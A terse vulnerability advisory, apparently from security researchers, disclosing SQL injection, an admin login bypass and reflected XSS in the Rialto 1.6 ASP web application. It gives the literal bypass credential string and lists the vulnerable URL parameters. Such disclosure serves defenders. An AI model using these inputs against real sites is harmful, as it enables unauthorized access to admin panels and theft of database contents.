Rialto version 1.6 suffers from cross site scripting, login bypass, and multiple SQL injection vulnerabilities.
4b59d02436c2a8ec0c8c8e1bfd97addf803ed4c39afbc84c4dc2a7314e96f482
vendor site: http://www.grandora.com/
product : Rialto 1.6
bug:multiples injection sql , login bypass , xss
risk : high !
admin login bypass :
/admin/default.asp
username: ' or '1' = '1
passwd: ' or '1' = '1
injection sql :
/listfull.asp?ID='[sql]
/listmain.asp?cat='[sql]
/printmain.asp?ID='[sql]
/searchkey.asp?Keyword='[sql]
/searchmain.asp?I1=1&area='[sql]
/searchoption.asp?I12=1&cat='[sql]
/searchmain.asp?I1=1&area=all&cat='[sql]
/searchoption.asp?I12=1&cat=all&area='[sql]
/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&acreage2=.5&squarefeet1='[sql]
xss get :
/listmain.asp?cat=[xss]
/searchkey.asp?Keyword=[xss]
/searchmain.asp?I1=1&area=all&cat=[xss]
/forminfo.asp?refno=[xss]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com